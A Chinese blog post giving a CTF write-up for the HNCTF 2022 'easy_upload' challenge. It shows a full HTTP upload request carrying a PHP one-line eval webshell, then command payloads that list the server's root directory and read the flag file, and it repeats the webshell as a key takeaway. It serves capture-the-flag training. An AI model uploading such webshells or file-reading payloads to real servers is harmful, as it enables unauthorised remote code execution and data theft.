【CTF】[HNCTF 2022 Week1]easy_upload

最新推荐文章于 2023-10-25 13:38:05 发布
最新推荐文章于 2023-10-25 13:38:05 发布
阅读量294 收藏 1
点赞数
分类专栏: # CTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47055136/article/details/131291018
版权

[HNCTF 2022 Week1]easy_upload

play

POST /index.php HTTP/1.1
Host: node2.anna.nssctf.cn:28760
Content-Length: 329
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://node2.anna.nssctf.cn:28760
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydmXAZf9bLhu93Arm
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://node2.anna.nssctf.cn:28760/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=4a93f4c4530217fbb05fe9e1b2da945b
Connection: close

------WebKitFormBoundarydmXAZf9bLhu93Arm
Content-Disposition: form-data; name="file"; filename="sqzr.php"
Content-Type: application/octet-stream

<?php 
@eval($_POST['cmd']);
?> 
------WebKitFormBoundarydmXAZf9bLhu93Arm
Content-Disposition: form-data; name="submit"

提交
------WebKitFormBoundarydmXAZf9bLhu93Arm--

webshell工具连接,flag在/下 文件名ffflllaaaggg
或者GET请求
cmd=var_dump(scandir(“/”)); #获取/目录
cmd=var_dump(file_get_contents(“/ffflllaaaggg”)); 读取flag文件

知识点

  • cmd=var_dump(scandir(“/”)); #获取目录
  • cmd=var_dump(file_get_contents(“/ffflllaaaggg”)); 读取文件
  • 一句话
<?php @eval($_POST['cmd']);?>
西原一点红
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
D3CTF2022-官方WriteUp1
08-03
"D3CTF2022-官方WriteUp1" 本文将对 D3CTF 2022 官方 WriteUp1 进行总结,主要涉及 MySQL UDF 提权、Java 反序列化、MySQLInject、Web 短链技术等多方面的知识点。 1. MySQL UDF 提权 在 MySQL 中,可以使用 User...
CTF工具-轩禹CTF_RSA工具2.2
02-17
CTF工具,用于完成RSA的基础题目。包括共模攻击、广播攻击、维纳攻击、低加密指数攻击、费马分解、模不互素、NC不互素等常见攻击方式的解题。
[HNCTF 2022 Week1]easy_upload
qq_66013948的博客
10-25 136
之后使用burp抓包,将其文件类型改为image/jpeg之后放行就可以上传成功了,浏览器上能够有回显,之后我们访问这个文件,能发现浏览器有GIF89a的回显,那么就证明能访问到,之后,我们就可以通过get传参来获取flag,我们构造语句为。刚开始看到这道题的时候,毫无疑问,可以看出来这是一道文件上传漏洞,既然如此,就按照寻常的方法来做这一题,首先写一个文件叫getshell.php的文件,里面的内容为。一次增加../的个数来查看文件夹,根据名称判断flag是否在里边,之后就构造。来获取flag的值。
ctf-第五周 | Easy upload
qq_29566629的博客
02-10 684
知识点: 要成功上传才能得到提示。 filename是文件格式 Content-type 是文件类型 要求文件内容里有什么内容,可以使用burp里的repeater直接进行增删改查。
2022HNCTF-web
bossDDYY的博客
10-30 3155
应该和http协议有关 想要什么 肯定flag说我们不是admin 看看cookie修改cookie继续修改 x-forwarded-for [Week1]2048 分析 题目描述你能达到20000分吗?应该是要求我们玩到20000分F12查看脚本直接输入在控制台输入 [Week1]easy_html 分析 输入框限制了11位 f12修改html属性 或者直接post参数 [Week1]Interesting_include 分析 题目描述:web手要懂得搜索 应该要借助浏览器一眼伪协议base64解码 [
HNCTF 2022 week1 web方向题解
m0_74160536的博客
08-01 639
简单说一下file伪协议,也是引用的别人博客(https://blog.csdn.net/qq_37466661/article/details/126203437)但正常情况下,我们输入php?filter=flag.php,只会发现一片空白,这时就需要用到php伪协议了,而这道题使用的就是file伪协议。检查-网络-刷新网页,只有两个网络响应,不过另一个是图标,不用管,打开cookie,提示去/f14g.php,跳转。打开环境,是一个小游戏,目标是2000分,不用管,小游戏题基本都是找js代码。
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
轩禹CTF_RSA工具3.6.1.zip
最新发布
01-29
CTF常用工具集
HNCTF——web方向部分题解
m0_60715541的博客
11-01 1485
这是这次分享的题解的清单,主要是web的,等我啥时候有时间更新一波杂项的题解。
NSSCTF之Web篇刷题记录(13)
Aluxian_的博客
06-01 1097
【代码】NSSCTF之Web篇刷题记录(13)
文件上传漏洞
m0_70683009的博客
05-21 1148
如果对方中间件是apache属于低版本,我们可以利用文件上传,上传一个不识别的文件后缀,利用解析漏洞规则成功解析文件,其中的后门代码被执行。,可以被当作php文件进行解析,从最后一个.mmm开始,apache不认识,就往前走,一直到.php,这样即绕过了验证,有可以进行解析。⑤:不删除末尾的点,在后缀名加点(需要在抓到的数据包中加点,直接在文件后缀名加点会命名不成功,它会自动删除点)(2) 当上传文件.asp;上传可以上传的文件,在文件地址后加上/x.php,可以让文件以php代码去执行。
NSSCTF之Web篇刷题记录(12)
Aluxian_的博客
05-23 1574
【代码】NSSCTF之Web篇刷题记录(12)
[HNCTF 2022 Week1]Challenge__rce
m0_70819573的博客
04-17 775
由于php变量没有赋值时默认是零,且数组与字符串拼接时返回Array,由此由A自增可以得到全部26位字母通过拼接构造payload.对字符串进行异或操作时,php解析时会将异或结果自动转换为字符串,以其给$_赋值,再通过拼接获取payload。也就是对$a进行取反操作,形成非常规字符绕过限制,在浏览器解析的时候,再还原成原来的payload.而在本题,由于长度限制,所以可以构造参数,再上传参数减少长度。无参RCE,主要方法有三种,取反,自增,异或。这里因为~和^都被过滤了,所以考虑自增。
2022hgame-week1 wp
Anton1a的博客
01-28 1728
记录一下hgame比赛。 WEB easy_auth 打开题目是一个登录框 题目描述里有admin,那就随便输个弱口令抓包看一下 看见返回包有这个,就想到这个题肯定考察js,为验证一下想法看一下源代码,里面存在login.js打开看一下发现确实是前端验证的 之后就注册一个账号登录看一下登录成功的返回包 登录成功返回的结果如下: {"code":2000,"message":"success","count":0,"data":[{"token":"eyJ...
[HNCTF]crypto-wps
weixin_52118017的博客
10-28 2188
hnctf-crypto方面题解
什么是CGI?
z_ruitao的博客
12-02 5273
CGI(Common Gateway Interface),即通用网关接口,是WWW技术中最重要的技术之一,是外部应用程序(即CGI程序)与WEB服务器之间的接口标准,负责在CGI程序和Web服务器之间传递信息。 CGI是Web服务器运行时,调用外部应用程序(即CGI程序,如nginx fast-cgi)的规范,CGI规范允许Web服务器执行外部程序,并将它们的输出发送给Web浏览器,CGI将We...
[HFCTF 2022]两道web题目wp
cosmoslin的博客
03-28 6629
ezphp <?php (empty($_GET["env"])) ? highlight_file(__FILE__) : putenv($_GET["env"]) && system('echo hfctf2022');?> 看到这段代码不难联想到P神的博客 我是如何利用环境变量注入执行任意命令 题目给了一个docker用于本地搭建环境,可以发现题目用的系统环境为debian。在debian系操作系统中,sh指向dash;在centos系操作系统中,sh指向bash。 由于
buuctf [第五章 ctf之re章]easy_rust 高级语言逆向wp
09-17
在这个buuctf的Easy Rust高级语言逆向题目中,我们需要对给定的Rust语言程序进行逆向分析,并找到程序的存放在flag变量中的答案。 首先,我们需要使用Rust编译器将给定的源代码进行编译。然后,我们可以使用静态...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值